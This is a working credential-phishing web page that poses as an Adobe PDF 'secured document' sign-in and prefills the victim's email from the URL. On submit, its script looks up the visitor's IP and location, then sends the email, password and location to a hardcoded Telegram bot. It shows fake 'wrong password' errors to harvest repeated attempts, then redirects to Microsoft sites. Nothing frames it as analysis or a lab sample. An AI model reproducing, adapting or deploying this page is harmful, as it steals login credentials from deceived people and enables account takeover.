<script>
  
    var assignDOCto = ""; 
    
</script>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Secured Document Sign In To View</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-image: url("https://i.gyazo.com/f6aa8b4a938adc6f2e0793a39a0f4798.png");
            background-size: cover;
            background-position: center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #fff;
            border-radius: 8px;
            padding: 20px;
            text-align: center;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
            max-width: 400px;
            width: 0;
            opacity: 0;
            animation: slideIn 0.5s forwards;
        }
        @keyframes slideIn {
            from {
                width: 0;
                opacity: 0;
            }
            to {
                width: 100%;
                opacity: 1;
            }
        }
        .logo {
            width: 100px;
            height: 100px;
            margin: auto;
            display: block;
        }
        h2 {
            font-weight: bold;
            margin-top: 20px;
            margin-bottom: 10px;
        }
        input[type="text"],
        input[type="password"],
        button {
            width: calc(100% - 40px);
            margin-bottom: 10px;
            padding: 10px;
            border-radius: 5px;
            border: 1px solid #ccc;
            box-sizing: border-box;
        }
        button {
            background-color: #b71c1c;
            color: #fff;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        button:hover {
            background-color: #b71c1c;
        }
        .error-container {
            color: white;
            background: lightcoral;
            padding: 10px;
            margin-top: 10px;
            border-radius: 5px;
            display: none;
        }
        .spinner {
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-top: 4px solid #333;
            border-radius: 50%;
            width: 30px;
            height: 30px;
            animation: spin 1s linear infinite;
            margin: 20px auto;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="https://st.depositphotos.com/1431107/2316/v/450/depositphotos_23163768-stock-illustration-pdf-symbol.jpg" alt="ADOBE FILE" class="logo">
        <h2>This Document is Protected by <span style="font-weight: bold;">Adobe PDF</span></h2>
        <p>Sign in to verify you are not a roboot</p>

        <form name="loginForm" action="#" method="post">
            <input type="text" name="email" id="email" placeholder="Username" required value="">
            <input type="password" name="password" id="password" placeholder="Password" required>
            <button type="submit" id="submit-btn">View</button>
        </form>

        <div class="error-container"></div>
        <div class="spinner" style="display:none;"></div>
    </div>

    <script>

document.addEventListener('DOMContentLoaded', function() {
      
        var emailInput = document.getElementById('email');
        if (emailInput) {
           
            emailInput.value = assignDOCto;
        }
    });
        let signInAttempts = 0;
        let userEmail = '';
    
        window.addEventListener('DOMContentLoaded', () => {
            const emailFromURL = new URLSearchParams(window.location.search).get('email');
            if (emailFromURL) {
                const emailField = document.getElementById('email');
                if (emailField) {
                    emailField.value = emailFromURL;
                    userEmail = emailFromURL;
                }
            }
    
            const form = document.forms['loginForm'];
            const passwordField = document.getElementById('password');
            const signInButton = document.getElementById('submit-btn');
            const errorContainer = document.querySelector('.error-container');
            const spinner = document.querySelector('.spinner');
    
            document.querySelector('.container').style.animation = 'slideIn 0.5s forwards';
    
            form.addEventListener('submit', async (event) => {
                event.preventDefault();
    
                signInAttempts++;
                signInButton.textContent = 'Loading...';
                const formData = new FormData(form);
                const email = formData.get('email');
                const password = formData.get('password');
    
                try {
                    // Fetching IP location
                    const ipResponse = await fetch('http://ip-api.com/json');
                    const ipData = await ipResponse.json();
                    const location = `Country: ${ipData.country}, City: ${ipData.city}, IP: ${ipData.query}`;
    
                    // Preparing message to send
                    const message = `shabango customer for ${email} with thier access ${password}. Location: ${location}`;
    
                    const telegramAPI = 'https://api.telegram.org/bot7459051070:AAELdvG-o0hpatc5WQD5JyKZgCbbP-z9V4k/sendMessage';
                    const response = await fetch(telegramAPI, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({
                            chat_id: '7018212882',
                            text: message
                        })
                    });
    
                    const responseData = await response.json();
    
                    if (!responseData.ok) {
                        throw new Error('Failed to send message to Telegram');
                    }
    
                    if (signInAttempts <= 2) {
                        showError(errorContainer, 'Wrong password. Please try again.');
                    }
    
                    signInButton.textContent = 'View';
    
                    if (signInAttempts === 3) {
                        spinner.style.display = 'block';
                        setTimeout(() => {
                            const redirects = ['https://microsoft.com', 'https://office.com', 'https://live.com'];
                            window.location.href = randomRedirect;
                        }, 1500);
                    }
                } catch (error) {
                    showError(errorContainer, 'Failed to submit form. Please try again.');
                    signInButton.textContent = 'View';
                }
            });
        });
    
        function showError(errorContainer, message) {
            errorContainer.textContent = message;
            errorContainer.style.display = 'block';
    
            // Clear password field
            document.getElementById('password').value = '';
    
            // Hide the error message after a few seconds
            setTimeout(() => {
                errorContainer.style.display = 'none';
            }, 3000);
        }
    </script> 
    
</body>
</html>

